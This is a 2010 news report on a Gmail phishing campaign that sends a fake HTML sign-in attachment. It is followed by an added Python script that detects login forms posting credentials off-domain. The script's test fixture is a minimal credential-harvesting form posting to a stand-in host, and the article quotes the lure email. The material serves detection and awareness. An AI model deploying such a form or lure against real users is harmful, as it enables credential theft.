Sep 8, 2010 13:21 GMT

Security researchers from Sunbelt warn of a new wave of spam emails, which masquerades as official communications from Google in an attempt to steal login credentials from Gmail users.

The fake emails are well crafted and display visual elements associated with the Web search giant, such as the Google Accounts logo and the copyright notice.

The messages purport to originate from the Google Team and read as follows:

"Hello,

Your Google account information is incomplete, We recommend that you update your Google account for security reasons.

Download and open the attachment in this mail and follow the direction to update your Google account."

The attached file is an HTML document called Gmail_access.html. Opening it in any browser displays a fake page almost identical to the real Gmail sign-in page.

In fact, the images and other elements shown on the rogue page are loaded from Google's real website.

"If you check the attachment source code you can see that it sucks genuine Gmail page elements," Tom Kelchner writes on the Sunbelt blog.

The fake sign-in form sends the entered data to a ServiceLoginAuth.php script hosted on an external domain, which stores it for the attackers.

"The information entered on the bogus page is snatched by a site registered to someone in Sremska Kamenica, Serbia," Kelchner explains.

However, this appears to be a legitimate website that has been compromised, as it runs an outdated and probably vulnerable version of the e107 content management system.

This campaign appears to have started sometime at the beginning of this month as there are reports about it on the official Gmail help forum dating back to September 1.

Fortunately, there is a simple way for users to check whether they are on the real Gmail login page, since the site has SSL enabled by default.
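The two points above, that the page pulls genuine Google assets yet posts the typed credentials to a PHP script on an unrelated host, and that the real login page is served over SSL, translate directly into a triage check for HTML attachments. The script below is an added example and not code from Sunbelt or from the article; the sample attachment it inspects is constructed to resemble the one described, the host example.invalid stands in for the attacker's domain, and the set of hosts treated as genuine Google login endpoints is an assumption made for illustration.

```python
"""Flag an HTML attachment whose login form posts credentials off-domain.

Added example (not from the Sunbelt post). GENUINE_LOGIN_HOSTS is an
assumed allow-list; the sample pages below are constructed for the demo.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed allow-list of hosts a genuine Google sign-in form may post to.
GENUINE_LOGIN_HOSTS = {"accounts.google.com", "www.google.com"}


def _is_google_host(host):
    """True for google.com and its subdomains (not for e.g. notgoogle.com)."""
    return host == "google.com" or host.endswith(".google.com")


class _FormCollector(HTMLParser):
    """Collects form actions, password inputs and remote asset references."""

    def __init__(self):
        super().__init__()
        self.form_actions = []
        self.password_fields = 0
        self.remote_assets = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.form_actions.append(a.get("action") or "")
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.password_fields += 1
        elif tag in ("img", "link", "script"):
            ref = a.get("src") or a.get("href")
            if ref:
                self.remote_assets.append(ref)


def analyze_login_page(html):
    """Return where the page's forms send credentials and why that is suspicious.

    The decision is driven by the form's destination, not by where the logos
    come from: a page can embed Google's real images and still be a trap.
    """
    p = _FormCollector()
    p.feed(html)
    findings = []
    for action in p.form_actions:
        u = urlparse(action)
        if not u.scheme:
            # A relative action in an attachment posts back to file:// or to
            # whatever site the user happens to be on; never a real login.
            findings.append(f"form posts to relative target {action!r}")
            continue
        if u.scheme != "https":
            findings.append(f"form posts over {u.scheme}, not https: {action}")
        if u.hostname not in GENUINE_LOGIN_HOSTS:
            findings.append(f"form posts to off-domain host {u.hostname}: {action}")
    if p.password_fields and not p.form_actions:
        findings.append("password field outside any form (script-driven submit?)")
    genuine_assets = sum(
        1 for ref in p.remote_assets
        if urlparse(ref).hostname and _is_google_host(urlparse(ref).hostname)
    )
    return {
        "suspicious": bool(findings),
        "findings": findings,
        "genuine_assets": genuine_assets,  # informational only
    }


# Constructed sample: looks like Gmail (real Google image) but posts elsewhere.
PHISHING_ATTACHMENT = """<html><body>
<img src="https://www.google.com/accounts/google_transparent.gif">
<form method="post" action="http://example.invalid/ServiceLoginAuth.php">
<input type="text" name="Email"><input type="password" name="Passwd">
<input type="submit" value="Sign in"></form></body></html>"""

# Constructed sample of what a genuine form would look like under the allow-list.
GENUINE_LIKE_PAGE = """<html><body>
<form method="post" action="https://accounts.google.com/ServiceLoginAuth">
<input type="text" name="Email"><input type="password" name="Passwd">
</form></body></html>"""


if __name__ == "__main__":
    for name, page in (("attachment", PHISHING_ATTACHMENT), ("genuine", GENUINE_LIKE_PAGE)):
        result = analyze_login_page(page)
        print(name, "suspicious" if result["suspicious"] else "ok")
        for f in result["findings"]:
            print("  -", f)
```

The phishing sample trips two findings (plain HTTP and an off-domain host) even though it loads a genuine google.com image, which is exactly why the asset origin is reported but never used to clear a page.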